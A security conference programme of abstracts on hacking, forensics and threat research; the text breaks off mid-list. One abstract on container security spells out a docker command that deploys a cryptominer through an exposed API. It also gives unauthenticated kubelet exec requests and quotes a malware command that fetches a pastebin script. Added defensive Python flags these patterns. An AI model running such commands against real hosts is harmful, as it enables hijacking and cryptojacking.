10:30
90min
Hacking Bluetooth Low Energy devices with Btlejack
Damien Cauquil

This workshop will dive into the Bluetooth Low Energy specifications and teach you how to use Btlejack and its features to hack various BLE devices.

You will learn about the various versions of Bluetooth Low Energy (from 4.0 to 5.1), how to effectively perform reconnaissance, how to sniff and analyze any BLE connection but also many tricks and techniques you can use to ease your analysis. Last but not least, you will also learn how to hijack and disconnect devices and how to manually test any BLE stack for vulnerabilities.

All of this by using (mostly) Btlejack \o/

Workshops
Hollenfels
10:30
90min
Reversing WebAssembly Module 101
Patrick Ventuzelo

WebAssembly (WASM) is a new binary format currently supported by all major web browsers (Firefox, Chrome, Safari and Edge). WebAssembly modules are most commonly compiled from C/C++/Rust source code, then loaded and executed from JS scripts. It is known for being used for malicious purposes like cryptojacking, but you will also find legitimate usage of WebAssembly inside web-browser add-ons, Node.js modules or even blockchain smart contracts.

In this workshop, I will first introduce WebAssembly concepts and why it is considered a “game changer for the web”. Secondly, I will show how to analyze a WebAssembly module using different techniques (static & dynamic) as well as some open-source tools that make your life easier (Octopus, Wasabi, ...). Finally, we will get hands-on with simple examples/crackmes and then go through the analysis of cryptominers.

Workshops
Fischbach
10:30
20min
Smartphone apps: let's talk about privacy
Axelle Apvrille

Smartphone applications do not respect your privacy.
If you are at Hack.Lu, you probably more or less already know this.
In the best cases, you found a few solutions to minimize the issue.
Or you surrendered (what can we do about it, huh?).

But are you really aware of the extent of the problem? Is it only your IMEI and your location that leak?
Are there still private apps out there?
Jump in for some Android disassembly, logs and Frida hooks.

Talks
Europe
10:50
20min
Fingerpointing False Positives: How to better integrate Continuous Improvement into Security Monitoring
Desiree Sacher

This talk is about how you can make your Security Operations Center more efficient and give your bored-out analysts more purpose by making a small change to your security monitoring process, with a potentially huge change in your workflow and improved results.

Talks
Europe
11:15
45min
Tiplines Today
harlo

Nowadays, the majority of US-based newsrooms rely primarily on consumer-facing applications to facilitate secure communications with sources. Tools like Signal, WhatsApp, Threema, and others have spiked in usage as the most state-of-the-art way to ensure confidential conversations with at-risk leakers and whistleblowers. Documents flood newsrooms, sometimes gigabytes at a time, and journalists need tools to interrogate that data in relative safety from device compromise and legal interception, all while getting the job done at the accelerated speed of the news cycle. Let's explore how these tools, from both a technical and a behavioral usage standpoint, make the news. Sometimes in a good way, when a story comes out after months of clandestine collaboration with sources and toiling over data that needs to be interrogated; sometimes in a bad way, when sources get burned or organizations endanger themselves.

With this talk, I aim to explain a theoretical bridge between hackers and other technologists, and a special group of end users (journalists and their sources) who are, often without their prior knowledge, at the complete mercy of tools they barely understand under the hood. This talk should be as satisfying for hackers as it will be for folks who love to hear spicy stories about how the "sausage gets made" in contemporary newsrooms.

Europe
13:15
180min
Introduction to Osquery
David Szili

This workshop will introduce osquery to the participants, starting with the capabilities of the tool, how to configure it and use extensions, and how to perform fleet management to scale the solution for enterprise environments.

Workshops
Hollenfels
13:15
180min
Java Web Application Secure Coding Workshop
Eva Szilagyi

Context-dependent output encoding? Prepared statement with bind variables? Disable external entity resolution? Storing passwords in salted hash format? If you are involved in Java development, come to my workshop and we will see together, why these are important from a security perspective!

Workshops
Fischbach
13:15
90min
Open the safe and get cured.
Stijn Tomme

Open the safe and get cured.
From manufacturing your network cable to determining the code… and getting the anti-virus

Workshops
Assembourg
13:15
45min
The Road to Hell is Paved with Bad Passwords
Chris Kubecka

Ever wonder what incident management is like when an embassy gets hacked, by ISIS? Come on a journey of surprisingly weak security, insider threats, a 50 million dollar extortion attempt, diplomatic immunity, city-wide security lockdown, all while >400 dignitaries’ lives dangle in the negotiation crossfire. Join Chris, the lead investigator and resolver on a super-secret squirrel adventure against ISIS & Turkish Intel in The Hague, The Netherlands, discussing the 2014 Saudi Arabian embassy hack. Whoever said STEM was boring made it boring! Solve the crime and save lives with key takeaways from a real-life cyber terrorism investigation. No classified information will be shared; some terrorists were harmed in the making of this talk.

Talks
Europe
14:00
45min
Say Cheese - How I Ransomwared your DSLR Camera
Eyal Itkin

It's a nice sunny day on your vacation, the views are stunning, and like on any other day you take out your DSLR camera and start taking pictures. Sounds magical right? But when you get back to your hotel the real shock hits you: someone infected your camera with ransomware! All your images are encrypted, and the camera is locked. How could that happen?

In this talk, we show a live demo of this exact scenario. Join us as we take a deep dive into the world of the Picture Transfer Protocol (PTP). The same protocol that allows you to control your camera from your phone or computer can also enable any attacker to do that and more. We will describe in detail how we found multiple vulnerabilities in the protocol and how we exploited them remotely(!) to take over this embedded device.

But it doesn't end here. While digging into our camera, we found a reliable way to take over most of the DSLR cameras without exploiting any vulnerability at all. We simply had to ask our camera to do that for us, and it worked.

This is the first vulnerability research on the Picture Transfer Protocol, a vendor agnostic logical layer that is common to all modern-day cameras. As DSLR cameras are used by consumers and journalists alike, this opens up the door for future research on these sensitive embedded devices.

Talks
Europe
15:00
90min
Open the safe and get cured.
Stijn Tomme

Open the safe and get cured.
From manufacturing your network cable to determining the code… and getting the anti-virus

Assembourg
15:15
45min
The regulation (EU) 2019/796 of 17 May 2019 concerning restrictive measures against cyber-attacks threatening the Union or its Member States
Eve Matringe

Article 215 of the Treaty on the Functioning of the European Union allows the Council to adopt restrictive measures against natural or legal persons and groups or non-State entities in some specific cases. This Regulation applies to cyber-attacks with a significant effect, including attempted cyber-attacks with a potentially significant effect, which constitute an external threat to the Union or its Member States.
The talk covers what measures can be adopted, according to what procedure and under what conditions, against whom, and what remedies are available.

Talks
Europe
16:00
180min
Jobfair
Hack.lu

As Hack.lu is the biggest and most established technical information security conference in the Benelux region, it attracts a lot of highly technical attendees and some of them are looking for new challenges.

This is why we decided to give the opportunity to companies looking for such profiles to get in touch with them during the conference.

Schengen
16:00
45min
New Tales of Wireless Input Devices
Matthias Deeg, Gerhard Klostermeier

In our talk, we will present new security tales and vulnerabilities of wireless mice, keyboards, and presenters using 2.4 GHz radio communication that we have collected over the last two years.

In 2016, we published the results of our research project "Of Mice and Keyboards: On the Security of Modern Wireless Desktop Sets" and publicly disclosed several security vulnerabilities in wireless desktop sets from different manufacturers that use AES encryption. In the same year, Bastille Research independently published security vulnerabilities in wireless mice and keyboards of different manufacturers, too. As time went by, we have learned more about the (in)security of further wireless input devices like mice, keyboards, and presenters using different 2.4 GHz radio-based technologies, and want to share our experiences and gained knowledge concerning these devices.

In our talk, we want to present answers to unanswered questions of our previous wireless desktop set research, raise the awareness of security issues and practical attacks against vulnerable wireless input devices, and tell some interesting tales.

Talks
Europe
17:00
20min
Memory forensics analysis of Cisco IOS XR 32 bits routers with 'Amnesic-Sherpa'
Solal jacob

Nowadays attackers are targeting not only computers but also core network equipment like routers, using memory-only attacks that are difficult to detect because the firmware image is not modified. In order to determine whether a router was compromised by a memory-only attack, we need to be able to perform forensic analysis on it, but this requires specialized tools. This presentation is about Cisco IOS XR router forensics. We will explain how the internals of a 32-bit Cisco IOS XR router running on the QNX operating system work. And, as no tool currently exists to analyze Cisco IOS XR routers, we developed a router forensics framework called 'Amnesic-Sherpa', aimed at analyzing memory dumps, that can be used to determine whether a router was compromised. This framework will be released as open source.

Talks
Europe
17:20
20min
Kill MD5 - demystifying hash collisions
Ange Albertini

Understanding the impact of hash collisions without a PhD in crypto.
Showing how vulnerable MD5 can be.

Talks
Europe
09:00
90min
Open the safe and get cured.
Stijn Tomme

Open the safe and get cured.
From manufacturing your network cable to determining the code… and getting the anti-virus

Assembourg
09:00
45min
Sensor & Logic Attack Surface of Driverless Vehicles
Zoz

Networked and connected vehicles have the same network attack surface as other IoT devices, but are also heavily reliant on sensor inputs and on split-second decision making under uncertain conditions, which makes them suffer from a unique set of vulnerabilities even when network attacks are discounted. In this session the state of automated vehicle technology will be presented with a focus on the attack surface presented by vehicles' sensor and control logic suites, and the potential failure modes that could be exploited by malicious hackers and criminals.

Talks
Europe
09:45
20min
Disturbance: on the Sorry State of Cybersecurity and Potential Cures
Saad Kadhi

Infosec research, good and bad, abounds, like almost everything else in this ‘infobese’ era. Cybersecurity conferences are filled with presentations exposing new vulnerabilities, as if we didn’t have enough of those already, describing best practices or showcasing tools and techniques. That is fine, as long as we keep the end goal in plain sight: protecting the digital realm.

In this blockchain-free talk, we’ll compare past, current and possible future trends of the threat landscape and attempt to demonstrate why, with all our goodwill and altruism, educational and mentoring programs, the sorry state of cybersecurity is here to stay unless we take a step back. It’s hard and yet necessary to question ourselves, to reframe and rephrase the messages that we have kept conveying for the last twenty years, and to stop the long shoulder-patting tradition. If we really care about cybersecurity, it’s time we address the core problems from a different perspective, one that requires hardship, courage and patience, one that places the audience at the centre, armed with a profit carrot in one hand and a liability stick in the other.

Europe
10:30
90min
Faup workshop, parse and investigate URLs!
Sebastien Tricaud

Faup is an open-source tool for working with URLs: mainly parsing, but also browser emulation and investigation. This workshop will teach the audience how to use Faup and its library, and how to write modules to do nifty hacks with URLs.

Workshops
Schengen
10:30
20min
Leveraging KVM as a debugging platform
Mathieu

Virtual Machine Introspection keeps opening new possibilities to interact with Virtual Machines, from sandboxing (VMRay) to cloud monitoring solutions (BitDefender HVI).

Our debuggers need to benefit from this approach too, and so far we have seen multiple open source projects trying to leverage the hypervisor as a new debugging platform. However, most of these solutions are tied to one hypervisor.

The VMI ecosystem can only grow if it can bring all developers under the same roof and provide the core libraries that will be the foundation for all VMI applications.

Keeping this vision in mind, pyvmidbg is a GDB stub built on top of LibVMI, a hypervisor-agnostic VMI library. It can introspect Windows VMs and explore the execution context to target and debug a specific process running on the system.

One of the goals of pyvmidbg is to attract developers and users by writing the missing layers that prevent VMI from gaining wider adoption today.

The lack of VMI APIs available on KVM has made LibVMI a Xen-centric library, despite its flexible architecture. However, the situation changed in 2017, thanks to BitDefender proposing a new set of APIs for introspection.

This talk will demonstrate the new KVM introspection subsystem proposed by BitDefender, its integration in LibVMI, and how pyvmidbg is running on top of KVM today.

Talks
Europe
10:30
90min
Open the safe and get cured.
Stijn Tomme

Open the safe and get cured.
From manufacturing your network cable to determining the code… and getting the anti-virus

Assembourg
10:30
90min
Repacking the unpacker: Applying Time Travel Debugging to malware analysis
Benoit Sevens

In this workshop we will apply the Time Travel Debugging feature of WinDbg, one of the most powerful Windows debuggers, to the field of malware analysis. We will show with concrete examples how this technology can be very effective in reversing complex samples in a timely manner.

Workshops
DieKirch-Echternach
10:50
20min
The Red Square - Mapping the connections inside Russia's APT Ecosystem
Itay Cohen, Ari Eitan

If the names Turla, Sofacy, and APT29 strike fear into your heart, you are not alone. These are known to be some of the most advanced, sophisticated and notorious APT groups out there -- and not in vain. These Russian-attributed actors are part of a bigger picture in which Russia is one of the strongest powers in the cyberwarfare today. Their advanced tools, unique approaches, and solid infrastructures suggest an enormous and complicated operation that involves different military and government entities inside Russia.

That said, and with all the available information on these groups, there are still some questions to bear in mind: Are the different government entities working alone or are they sharing code and techniques with each other? What artifacts, libraries and code are more likely to be shared between different families and teams of the same actor?

The fog behind these complicated operations made us realize that while we know a lot about single actors, we are short of seeing the bigger picture - a whole ecosystem with actor interaction (or lack thereof) and particular TTPs that can be viewed in a larger scope. We decided to know more and to look at things from a broader perspective. This led us to gather, classify and analyze thousands of Russian APT malware samples in order to find connections - not only between samples, but also between different families and actors.

In this talk, we will describe the process of our research. Namely, we will show how the technologies at our disposal allowed us to take a deep dive into these malware's binary DNA in order to spot the mutual Genes that are shared between Russia's APT families and actors. We will show interesting connections that we found, and present the interactive map we created to visualize this complicated Russian APT ecosystem. We will also release a signature-based tool to detect old and new samples based on the popular mutual Genes we found.

Talks
Europe
11:15
45min
Fileless Malware Infection and Linux Process Injection in Linux OS
アドリアン ヘンドリック - Hendrik Adrian - @MalwareMustDie

Recent developments in file-less exploitation methods are also affecting the Linux platform. Process injection and file-less methods for malicious code execution are now supported by some post-exploitation tools for Linux. This trend may affect many Internet services and connected devices and trigger wider, multiple incidents with more damage, so we may need to re-assess our current security readiness for protecting these platforms.

In this presentation we will discuss the methods of file-less infection and Linux process injection seen in recent trends from a blue-team perspective, followed by a summary of how we spotted their usage in some public incidents, along with the most applicable forensic methods that may help fellow incident responders handle such cases.

The information shared in this presentation is set on TLP AMBER.

Europe
13:15
180min
AppSec 101: Understanding and exploiting buffer overflows
Antonin Beaujeant

This workshop will explain one of the best-known application security vulnerabilities: the buffer overflow. We will start from the very beginning, explaining what a CPU is, how it executes operations and coordinates with memory and inputs/outputs in order to run applications. We will then have a programming crash course (C language) and then move to assembly. Don't worry, we won't go too deep, just enough to understand the next chapter: understanding, identifying and exploiting a buffer overflow.

Workshops
DieKirch-Echternach
13:15
45min
Exploiting bug report systems in the game industry
Andreia Gaita

In the world of development, what do you do when you run into a bug in the library, framework, or middleware you're using? You submit a bug report and describe the steps. The companies providing you with the software expect and encourage you to send in repro code, but the bigger the system, the more complex the code needs to be to reproduce the problem. In the case of game development, the expectation is that when you find a bug, you submit a complete test project that exemplifies the problem, so that test teams can reproduce it. What can these test projects contain? How are they tested by companies developing game engines and middleware? What potential exploitation venues does this open?

There are unique conditions in the game industry that make it particularly vulnerable to certain types of attacks, but its uniqueness also makes it somewhat of a puzzle to the rest of the tech industry. In this talk, we'll go through some of the particulars of how game development works, and how these practices and bug reporting systems can be exploited to gain access to the core of development teams across the game industry.

Talks
Europe
13:15
180min
Hash collisions exploitations
Ange Albertini

To understand the extent of MD5 and SHA1 collisions without the maths,
and to come up with your own collision tricks to actually prove that MD5 shouldn't be used.

Workshops
Hollenfels
13:15
90min
Learn to use ONYPHE to have a view on your Internet exposed devices
Patrice Auffret

When a company grows, it becomes difficult to track every Internet-exposed asset, especially nowadays with the prevalence of shadow IT and shadow Cloud services. Bad guys know it too well: they have tools and do monitor your exposed infrastructure. You should be the first to uncover a vulnerability or an exposed sensitive asset before it is exploited for malevolent purposes.

Workshops
Schengen
13:15
90min
Open the safe and get cured.
Stijn Tomme

Open the safe and get cured.
From manufacturing your network cable to determining the code… and getting the anti-virus

Assembourg
13:15
180min
Sigma Workshop
Thomas Patzke

How to create Sigma rules and hunt evil in logs.

Workshops
Fischbach
14:00
45min
What the log?! So many events, so little time…
Miriam Wiesner

Detecting adversaries is not always easy. Especially when it comes to correlating Windows Event Logs to real-world attack patterns and techniques.

Join me to find out how to match Windows Event Log IDs with the MITRE ATT&CK framework and methods to simplify the detection in your environment.

Talks
Europe
15:00
90min
Open the safe and get cured.
Stijn Tomme

Open the safe and get cured.
From manufacturing your network cable to determining the code… and getting the anti-virus

Assembourg
15:15
45min
The Glitch In The Matrix
Marion

Compared to the hordes of code reviewers and review tools that skim through pristine source code with every release cycle, the attention binary output gets from security engineers is limited. And why would security folks bother, bugs are all human-made; or, are they? Honestly, in reality, most are. Modern compilers and build setups are rather unlikely to accidentally introduce flaws into binaries, let alone security relevant flaws. Except, well, if an attacker gets her hands onto the build chain...
Now, it has been established that compromised compilers can introduce bugs into output binaries; but really, how stealthy can this be? How small a change can an attacker plant and still create a security vulnerability? And which means of detection do we have for such glitches in the matrix? Shall we ask Neo?

Talks
Europe
16:00
45min
Hacktivism as a defense technique in a cyberwar. #FRD Lessons for Ukraine
Kostiantyn Korsun

Since 2014 Ukraine has been under cyberwar.
The BlackEnergy energy grid attack switched off electricity for 230,000 people for 6 hours. The NotPetya attack affected ~30% of the Ukrainian economy. Airports, railways, the banking system, media and critical infrastructure have been attacked by Russian cyber groups (Telebots, BadRabbit, GrayEnergy).
But have those attacks strengthened the national cybersecurity system of Ukraine?
Ukrainian cyber activists (hacktivists) checked that and published some shocking results.
This activity got the name #FuckResponsibleDisclosure (#FRD).
My talk is a historical retrospective of #FRD: when and how it started, what emotions it caused in Ukraine, how officials and resource owners communicated with hacktivists and others, how #FRD influenced national cybersecurity and what the local cybersec community thinks of #FRD.
The preso contains plenty of expressive screenshots.

Talks
Europe
17:00
20min
DeTT&CT: Mapping your Blue Team to MITRE ATT&CK
Marcus Bakker, Ruben Bouman

Within blue teams, it is crucial to have sufficient and adequate information on several aspects to prioritise your defence efforts. Important aspects are: visibility (indicate if you have sufficient data sources to be able to see traces of attack techniques), detection (how good are you in detecting attackers) and threat actor behaviours (to determine which attack behaviours are essential for your organisation to defend against).

Obtaining and administrating this information can be a challenge. In this talk we present the DeTT&CT framework, built atop MITRE ATT&CK, that helps blue teams to gain insight into these aspects and to start prioritising their defence efforts. The ultimate goal of DeTT&CT is to become more resilient against attacks targeting your organisation.

Talks
Europe
17:20
20min
Defeating APT10 Compiler-level Obfuscations
Takahiro Haruyama

Compiler-level obfuscations like opaque predicates and control flow flattening are starting to be observed in the wild and will be a challenge for malware analysts and researchers. Opaque predicates and control flow flattening are obfuscation methods used to limit malware analysis by defining unused logic, performing needless calculations, and altering code flow so that it is not linear. Manual analysis of malware utilizing these obfuscations is painful and time-consuming.

ANEL (also referred to as UpperCut) is a RAT used by APT10, typically targeting Japan. All recent ANEL samples are obfuscated with opaque predicates and control flow flattening. In this presentation I will explain how to automatically de-obfuscate the ANEL code by modifying the existing IDA Pro plugin HexRaysDeob. Specifically the following topics will be included.

  • Disassembler tool internals (IDA Pro IL microcode)
  • How to define and track opaque predicate patterns for the elimination
  • How to break control flow flattening while considering various conditional/unconditional jump cases even if it heavily depends on the opaque predicate conditions and has multiple switch dispatchers

The modified tool can work for most obfuscated functions in the tested samples. This implementation can deobfuscate approximately 92% of encountered functions. Additionally, most of the failed functions will be properly deobfuscated in IDA 7.3. Sharing the experience and knowledge of the implementation with the community will be valuable as threat actors other than APT10 may also start to use the same obfuscations.

Talks
Europe
19:00
60min
Call for Failure (CfF 0x0)
Hack.lu

Over Fail the untold truth behind the magic of cybersecurity

Europe
20:15
60min
Power Point Karaoke
Hack.lu

Fun

Europe
21:30
60min
Cinema
Hack.lu

Your choice

Europe
22:30
60min
Cinema
Hack.lu

Your choice

Europe
09:00
45min
Beyond Windows Forensics with Built-in Microsoft Tooling
Thomas Fischer

Microsoft has slowly been introducing tools to help organisations better manage and troubleshoot Windows performance and issues; these are now entirely integrated into Windows. To improve performance and troubleshooting capabilities, Microsoft introduced the System Resource Usage Monitor (SRUM) in Windows 8 and beyond. PowerShell has become the default “command line” management tool for Windows administrators. Both of these tools provide a wealth of information about what has happened and what is present on the system.

For Forensics and even Incident Response, these tools are now a go-to built-in option to bootstrap and drive the forensics process, including opening access to artefacts that an overzealous user or even a “smart” attacker has removed. SRUM, for instance, can provide data points ranging from network to process activity, providing insight into what, who, when and how an attacker or malicious process introduced itself into the environment.

This talk will help the participant build the foundations to identify which built-in tools can assist in the Windows Forensics process and the data points that are available, as well as examine how services such as SRUM can be used to extract key data points to provide information for incident response or threat hunting activities.

Talks
Europe
09:00
90min
Open the safe and get cured.
Stijn Tomme

Open the safe and get cured.
From manufacturing your network cable to determining the code… and getting the anti-virus

Assembourg
09:45
20min
Effectiveness in simplicity: The Taskmasters APT
Elmar Nabigaev

It is often thought that APT attacks are complex and involve 0-day exploits, stealthy lateral movement and hidden exfiltration paths.
While this can be true, it is rarely the case. Even APT actors follow the "if it works, don't break it" rule and use tried and true tactics. If they can get away with it and achieve their goals, why not?

In this talk I’m going to present our discovery of an APT group which used rather simple TTPs but managed to stay undetected and hidden for years while breaching some high value targets in the fields of government, manufacturing, telecommunications etc.

We’re going to dive deep into incident response cases, dissection of tools and techniques they used to infiltrate targets and cover possible attribution.

I’m also going to talk about problems we faced during responding to these cases and present recommendations how to defend networks against this adversary.

Europe
10:30
90min
IOCs are dead, long live the IOCs!
Celine Massompierre

Finding information is not a problem, what you do with it is up to you!

Nowadays sharing Indicators of Compromise (IOCs) is common; look at the MISP project for example.

In the big data era, having just an indicator like an IP address is not enough and in many cases is as useful as the key to a treasure chest without any map. What really matters today is metadata: data about data.

Workshops
Fischbach
10:30
90min
Junior CTF Install Party
Axelle Apvrille

Learn how to install Junior CTF for your kids to test their hacking skills.

Workshops
DieKirch-Echternach
10:30
90min
Open the safe and get cured.
Stijn Tomme

Open the safe and get cured.
From manufacturing your network cable to determining the code… and getting the anti-virus

Assembourg
10:30
90min
Snarf it! Firmware extraction and analysis with open source tools.
Pauline

At the core of every IoT device is its firmware. Detailed security assessment of devices starts with obtaining a copy of the firmware. The firmware can then be analysed statically or dynamically. Several techniques exist for firmware extraction.
This workshop takes participants through a low-level firmware extraction process which is easy to perform and doesn’t require expensive hardware.

Workshops
Hollenfels
10:30
45min
Who contains the containers
Emilien, Ioana Andrada

Who contains the containers?

introduction

Today it is extremely easy to deploy micro-services using container technologies. And as usual with every easy-to-deploy technology, people tend not to use common sense before using it: you are one click away from being easily compromised!

In this talk we will present the most common vulnerabilities and insecure configurations found in container technologies and how they are exploited. Then we will try to figure out whether we can find actually compromised containers on the Internet. Finally we will describe recommendations on how to secure container technologies and how to detect attacks against them.

Attacks against container technologies

When we speak about container technologies, two main components may be subject to attacks:

  • Container technologies (Docker, rkt, Solaris containers, Microsoft Containers ...)
  • Container orchestration tools (Kubernetes, Apache Mesos, Docker Swarm, Docker Datacenter)

Another important part of the environment is container storage (ClusterHQ, BlockBridge, EMC...), but it can be attacked through the orchestration engine, so we will not describe it in too much detail in this talk.

It is also important to highlight the fact that most cloud service providers provide their own implementation of orchestration tools, which can be targeted as well.

Exploiting vulnerabilities to break out of containers

The worst-case scenario for containers is a malicious or compromised container escaping and attacking the host system. This has of course already happened, with a vulnerability in runC (CVE-2019-5736: runc container breakout).

The vulnerability was discovered by Adam Iwaniuk and Borys Popławski and affects most container software; a proof-of-concept is available: https://github.com/Frichetten/CVE-2019-5736-PoC

While this vulnerability is probably the most critical, others are not to be ignored:

  • CVE-2018-11757 (Docker): a Docker action inheriting the Docker tag openwhisk/dockerskeleton:1.3.0 (or earlier) may allow an attacker to replace the user function inside the container if the user code is vulnerable to code exploitation,
  • CVE-2018-8115 (Docker for Windows): a remote code execution vulnerability exists when the Windows Host Compute Service Shim (hcsshim) library fails to properly validate input while importing a container image,
  • Vulnerabilities in the "rkt enter" command (CVE-2019-10144, CVE-2019-10145 and CVE-2019-10146): discovered by Yuval Avrahami, these vulnerabilities could be used to escape to the host system by planting traps in modified binaries inside a compromised container (https://www.twistlock.com/labs-blog/breaking-out-of-coresos-rkt-3-new-cves/)

Abusing APIs

APIs are great for automating admin tasks ... or for compromising at scale. If not properly secured, API access can be used to start, delete or configure containers or the host system.

Here are some attack examples abusing APIs:

  • Docker: create container via API

The Docker API is exposed on port 2375/TCP or 2376/TCP (SSL). If the default configuration is used (who does that? :D), a simple POST request gives us the possibility to deploy and start a Docker image. The image will be downloaded from Docker Hub automatically...

We can use a crafted HTTP request or just the docker client as shown below:

docker -H target:2376 run --restart unless-stopped --read-only -m 50M -c 512 bitnn/alpine-xmrig -o POOOOL -u WALLET -p X -k

  • Kubernetes: Unauthenticated endpoint on Kubelet (port 10250) to perform exec command

The exploitation takes two steps; first, a POST request to the exec endpoint:

POST "https://target:10250/exec/<namespace>/<podname>/<container-name>?command=whoami&input=1&output=1&tty=1"

Then a GET request (from an SPDY-capable client) using the Location header from the response to the previous request:

wscat -c "https://target:10250/cri/exec/XxXxXxXx" --no-check

A single GET request is used to list the available containers on the target:

GET "https://target:10250/pods"

Those two examples can be reproduced against most orchestration tools if the API endpoints are not properly secured.
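The defensive counterpart of the Docker API exposure described above, as an added example that is not part of the talk: a small Python check over a Docker daemon.json that flags a TCP listener configured without TLS client authentication. The keys it reads (hosts, tlsverify, tlscacert, tlscert, tlskey) are real daemon.json options; both configurations below are constructed samples.

```python
"""Check a Docker daemon.json for an Engine API listener exposed without
TLS client authentication (the 2375/2376 exposure described in the talk).

Added example, not the speakers' code. Keys checked are real daemon.json
options; the two configurations at the bottom are constructed samples.
"""
import json
from typing import Dict, List

TLS_MATERIAL = ("tlscacert", "tlscert", "tlskey")


def audit_daemon_config(config: Dict) -> List[str]:
    """Return findings for network-exposed API listeners; [] means none found."""
    findings: List[str] = []
    tcp_hosts = [h for h in config.get("hosts", []) if h.startswith("tcp://")]
    if not tcp_hosts:
        return findings  # only the unix socket (or nothing): not reachable remotely
    tls_verify = bool(config.get("tlsverify"))
    missing = [k for k in TLS_MATERIAL if not config.get(k)]
    for host in tcp_hosts:
        if not tls_verify:
            # Anyone who can reach the port gets full control of the daemon.
            findings.append(f"{host}: tcp listener without tlsverify (unauthenticated API)")
        elif missing:
            # dockerd falls back to default paths; make the material explicit.
            findings.append(f"{host}: tlsverify set but missing {', '.join(missing)}")
        if host.startswith(("tcp://0.0.0.0", "tcp://[::]", "tcp://:")):
            findings.append(f"{host}: bound to all interfaces")
    return findings


# Constructed sample: the default-style exposure the abstract warns about.
WEAK_CONFIG = json.loads("""
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}
""")

# Constructed sample: API only on 2376 with mutual TLS, bound to one address.
HARDENED_CONFIG = json.loads("""
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}
""")

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_daemon_config(cfg) or ["no findings"])
```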

Compromising container repositories

Supply-chain attacks can happen on container image repositories. An attacker could successfully push an update to a well-known container image and just wait for victims to deploy or update it, or even create an account on the repository (let's say Docker Hub, for example) and convince people to use their images.

That is exactly what happened recently with the Zuulu2 botnet (see https://github.com/docker/hub-feedback/issues/1809). Somebody pushed a cryptomining image on Docker Hub and exploited weak configurations to download and run the container image. The image is also used to discover new potential targets.

Is it legit?

While working on another project, we stumbled across some strange containers online, so we asked ourselves if we could find more of this suspicious stuff. We mostly concentrated on Docker as it is the most popular (and so the most targeted).

To do that, we developed some scripts to extract information on containers available online via their exposed API endpoints and to parse the extracted data to highlight potentially "unwanted" containers. Identifying online APIs is done by leveraging internet scanning services (Shodan, Onyphe and Censys).

Another technique consists of downloading unverified images (to limit the scope of the investigation, we looked for modified alpine images) from container image repositories and analysing the startup scripts of those images. A good tool to perform this task for Docker images is Dive (https://github.com/wagoodman/dive).

In this part, we will present some interesting containers we found running online and drill down into the TTPs used by the threat actor behind the supposed infection. Here are some examples (all Docker):

Xmrig image

Suspicious level: low

We found some Docker images used for cryptocurrency mining, which may be suspicious because it is probably the least efficient way to do mining... but you never know.

Nice wget you got there

Suspicious level: high

OK, this time we are sure it is malicious: chroot /mnt /bin/sh -c 'yum install wget -y;apt-get install wget -y;rm hrfbyyu.sh;wget https://pastebin.com/raw/h7HiT3uR ...

So when the image is started, it will install wget via yum OR apt-get, then download and execute a script from pastebin... does not really look legit...

The script itself is base64 encoded and contains update and persistence mechanisms for Linux and cryptomining activities.

Xulu botnet

Suspicious level: high

Some months ago, a user named zuulu2 on Docker Hub uploaded malicious images performing scanning of other potential victims and cryptomining activities. It spread by exploiting open Docker APIs. The malicious images were removed from Docker Hub.

By getting the list of running or available containers, we can see that the zuulu2 images are still running on several servers.

Dockerfile: CMD ["/run.sh"]

We identified this image posted on Docker Hub 6 months ago. The user only uploaded one image and the description was just CMD ["/run.sh"]. By using Dive, we identified the modifications from the base image (alpine):

  • adding a user named miner
  • downloading and compiling xmrig
  • starting the mining process (XMR)
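The triage step described in this part, as an added example (not the speakers' own scripts): a Python function that scores container records in the shape returned by the Docker Engine API endpoint GET /containers/json against the indicators seen in the cases above (xmrig, a chroot into /mnt, a second stage pulled from pastebin, the zuulu2 images) and maps the score to the talk's "Suspicious level" wording. Weights and thresholds are assumptions; all records are constructed, including the zuulu2 image name.

```python
"""Triage container records (Docker Engine API, GET /containers/json shape)
against the indicators seen in the 'Is it legit?' cases above.

Added example, not the speakers' scripts. Weights and thresholds are
assumptions; the sample records at the bottom are constructed.
"""
import re
from typing import Dict, List

# (pattern, weight) applied to the image name
IMAGE_INDICATORS = [
    (r"zuulu2", 4),   # images of the botnet described above
    (r"xmrig", 1),    # miner in the image name: low on its own, as in the talk
    (r"miner", 1),
]
# (pattern, weight) applied to the container command line
COMMAND_INDICATORS = [
    (r"chroot\s+/mnt", 4),                    # host root mounted and entered
    (r"pastebin\.com/raw", 4),                # second stage fetched from pastebin
    (r"(wget|curl)\b.*\|\s*(ba)?sh\b", 3),    # download-and-execute pipeline
    (r"(yum|apt-get)\s+install", 1),          # package install at start-up
    (r"xmrig|stratum\+tcp", 2),               # miner binary / pool scheme
]


def score_container(rec: Dict) -> int:
    """Sum the weights of every indicator matching this container record."""
    score = 0
    for pat, w in IMAGE_INDICATORS:
        if re.search(pat, rec.get("Image", ""), re.I):
            score += w
    for pat, w in COMMAND_INDICATORS:
        if re.search(pat, rec.get("Command", ""), re.I):
            score += w
    # A bind mount of the host root is what makes "chroot /mnt" possible.
    if any(m.get("Source") == "/" for m in rec.get("Mounts", [])):
        score += 3
    return score


def level(score: int) -> str:
    """Map a score to the talk's 'Suspicious level' wording."""
    return "high" if score >= 4 else "low" if score > 0 else "none"


def triage(records: List[Dict]) -> List[Dict]:
    """Return one {name, score, level} entry per container, worst first."""
    out = [{"name": r["Names"][0], "score": score_container(r),
            "level": level(score_container(r))} for r in records]
    return sorted(out, key=lambda e: e["score"], reverse=True)


# Constructed records (subset of the /containers/json fields).
SAMPLE_CONTAINERS = [
    {"Names": ["/web"], "Image": "nginx:1.17",
     "Command": "nginx -g 'daemon off;'", "Mounts": []},
    {"Names": ["/xmrig"], "Image": "bitnn/alpine-xmrig",
     "Command": "xmrig -o POOL -u WALLET -p x -k", "Mounts": []},
    {"Names": ["/dropper"], "Image": "alpine:3.9",
     "Command": "chroot /mnt /bin/sh -c 'yum install wget -y;apt-get install wget -y;"
                "wget https://pastebin.com/raw/PASTE_ID'",
     "Mounts": [{"Source": "/", "Destination": "/mnt"}]},
    {"Names": ["/zuulu2"], "Image": "zuulu2/alpine-scan",  # constructed name
     "Command": "/run.sh", "Mounts": []},
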